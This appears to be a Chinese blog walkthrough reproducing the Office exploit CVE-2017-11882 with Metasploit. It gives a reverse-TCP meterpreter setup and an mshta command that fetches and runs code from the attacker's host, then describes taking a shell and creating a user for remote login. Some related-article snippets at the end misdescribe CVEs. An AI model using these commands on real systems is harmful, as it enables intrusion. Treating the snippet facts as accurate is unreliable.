office漏洞 (CVE-2017-11882)复现

最新推荐文章于 2024-06-03 15:39:32 发布
最新推荐文章于 2024-06-03 15:39:32 发布
阅读量3.6k 收藏 7
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/piao_li/article/details/79165697
版权

在/usr/share/metasploit-framework/modules/exploits/windows/smb上传 cve_2017_1182.rb

在/usr/share/metasploit-framework/data/exploits上传cve-2017-1182.rtf文件

以上的文件准备好后即可用msf来进行操作

在搜索模块的时候出现以下错误

可以使用reload_all重新加载模块

使用use exploit/windows/smb/cve_2017_11882这个模块:

先用show options查看参数设置:这里除了设置URIPATH,还要设置payload,lhost

set LHOST ip

设置payload:set payload windows/meterpreter/reverse_tcp

设置URIPATH:set URIPATH test(这里设置的路径在下面运行python脚本时要把路径加上)

查看端口设置:

运行:exploit

在桌面上上传Command109b_CVE-2017-11882.py

使用命令:python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.117:8080/test" -o test1.doc


将生成的文件复制到目标机上打开文件,攻击机上传回来了session,说明攻击成功

输入sessions,可以看到两个session

使用命令:session -i 2选择会话2

使用shell,使用whoami查看权限,可以进行创建用户进行远程登录。

在kali 2.0中启动带数据库支持的MSF方式如下:
1 首先启动postgresql数据库:
/etc/init.d/postgresql start;或者 service postgresql start;
2 初始化MSF数据库(关键步骤!):msfdb init;(如不能初始化,就用msfdb reinit试试吧!默认创建的数据库名:msf,msf_test;用户名:msf;口令默认为空)
3 运行msfconsole:msfconsole;
4 在msf中查看数据库连接状态:db_status。
5更新metasploit:msfupdate


枫起
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
CVE-2017-11882复现及防御
hl1293348082的专栏
04-01 1896
本文作者:\xeb\xfe,加上之前的文章《一道 CTF 题 get 到的新姿势》完成两篇文章的任务,邀请加入知识星球,欢迎更多的人加入我们,一起交流、一起学习。 最新 OfficeCVE-2017-11882,完美无弹窗,无视宏,影响 office 全版本。利用触发器 WebClient 服务从攻击者控制的 WebDav 服务器启动和执行远程文件。该脚本使用多个 OLE 对象创建简单的文档。这些对象利用 CVE-2017-11882,从而导致连续命令执行。 复现过程 实验环境: win.
CVE-2017-11882漏洞复现过程中遇到的一些小问题
weixin_44375751的博客
01-24 3827
一、实验环境 靶机:Windows7 office2003 IP:192.168.87.129 渗透机:Kali Linux 2021.4a IP:192.168.87.130 问题1:安装的office2003中插入-对象中没有Microsoft 公式 3.0 解决方法:工具-自定义-命令 类别“插入”中找到命令“公式编辑器” 将其拖到工具栏中,点击图标,提示该功能尚未安装,点击是进行安装。 二、使用POC代码生成word文件 root@kali:~/Desktop/CV...
tomcat系列漏洞利用
最新发布
2401_84488537的博客
06-03 1252
Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用。主要组件:服务器Server,服务Service,连接器Connector、容器Container。连接器Connector和容器Container是Tomcat的核心。一个Container容器和一个或多个Connector组合在一起,加上其他一些支持的组件共同组成一个Service服务,有了Service服务便可以对外提供能力了。
CVE-2017-11882复现
yiyiiyiy的博客
11-24 3209
CVE-2017-11882复现 前言漏洞基本信息 漏洞ID CVE-2017-11882 漏洞名称 Microsoft Office数学公式编辑器内存损坏漏洞 威胁类型 远程代码执行 漏洞类型 栈溢出,位于EQNEDT32.EXE组件中 漏洞影响版本Microsoft Office 2000 Microsoft Office 2003Microsoft Office 2007 Service
Office CVE-2017-8570远程代码执行漏洞复现
脚本姑娘
01-12 1324
漏洞影响版本 很尴尬,此页无图 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 201
CVE-2017-8570微软office漏洞复现与研究
qq_38352420的博客
06-30 706
title: CVE-2017-8570微软office漏洞复现与研究 date: 2019-02-01 23:47:44 CVE-2017-8570微软office漏洞复现与研究 微软office漏洞背景 微软Office系统软件(Word/Excel/PowerPoint等),一直是电脑上最为常用的办公软件之一,在国内外都拥有大量的用户。另一方面,利用Office系列软件的漏洞进行网络攻击已经成为黑客惯用的手段,广泛运用于APT攻击,抓肉鸡,传播勒索病毒等。其中一种典型的攻击方式是“鱼叉攻击”:黑客将.
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
CVE-2017-11882CVE-2017-11882(通杀Office 2003到2016)
03-04
CVE-2017-11882概述 从突破利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的内置非常简单。此突破是由Office软件里面的[公式编辑器]造成的,由于编辑器进程没有对举个例子,如果黑客利用这...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
WPS office 最新未公开 0Day漏洞警示
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-23 1581
0day 漏洞可以由黑客或攻击者利用来攻击他们的目标,可以通过不同的方式来实现,例如,攻击者可以利用远程漏洞攻击,通过恶意的网络链接或 e-mail 附件来攻击目标,或者利用本地漏洞攻击,在目标系统上安装木马程序或其他恶意程序。近日,网传监测发现WPS Office for Windows版本 存在0day漏洞,攻击者可以利用该0day漏洞在受害者主机上执行任意恶意文件,高危级别,官方尚未对此发布修复漏洞,目前建议只能临时弃用wps或者不要点开未知文件,尤其在线网络文件,中招概率极大。
CVE-2017-11882 复现
Aevery的博客
02-13 2679
CVE_2017-11882复现
Office CVE-2017-11882漏洞复现
weixin_43268670的博客
07-08 461
Office cve-2017-11882漏洞,配上社工稳的一批,直接getshell 漏洞影响版本: Office 365 Microsoft Office 2000 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office ...
Office CVE-2017-11882本地复现
Jun_ay的博客
11-22 3869
Office CVE-2017-11882本地复现 这两天,office又出名了,CVE-2017-11882成了圈里关注的热点,今年office爆出好几个漏洞,从CVE-2017-0199、CVE-2017-8570到现在的CVE-2017-11882,exp也是越来越简单粗暴。 下面,我也来蹭波热度。Step1:万年计算器POCPOC GitHub:可以使用国外出现的第一份poc:https
CVE-2017-11882漏洞复现
weixin_30555125的博客
12-20 222
作者:zero 漏洞信息:CVE-2017-11882 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞CVE-2017-11882)。该漏洞Office内 存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。 漏洞影响版...
漏洞复现|Microsoft Office数学公式编辑器内存损坏漏洞CVE-2017-11882
weixin_42282189的博客
10-26 390
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 1、漏洞简介 CVE-2017-11882是微软公布的一个远程执行漏洞,该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出。 2、影响范围 office 2003 office 2007 office 2010 office 2013 office 2016 3、测试环境 win10:21H1 offi.
CVE 2017-11882 office缓存溢出漏洞复现
BROTHERYY的博客
10-15 484
1.漏洞概述 针对这个漏洞,微软在2017年11月14号,推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。 这里是poc地址 https://github.com/unamer/CVE-2017-11882 2.影响版本 office 2003 office 2007 office 2010 office 2013 office 2016 3.复现环境 渗透机:kali + POC代码【上述github地址】 靶机
MICROSOFT OFFICE MSDT操作系统命令注入漏洞CVE-2022-30190)
huayimy的博客
11-23 1252
MICROSOFT OFFICE MSDT操作系统命令注入漏洞CVE-2022-30190)输入技术支持人员提供的密钥
cve-2017-7504漏洞复现
08-23
对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值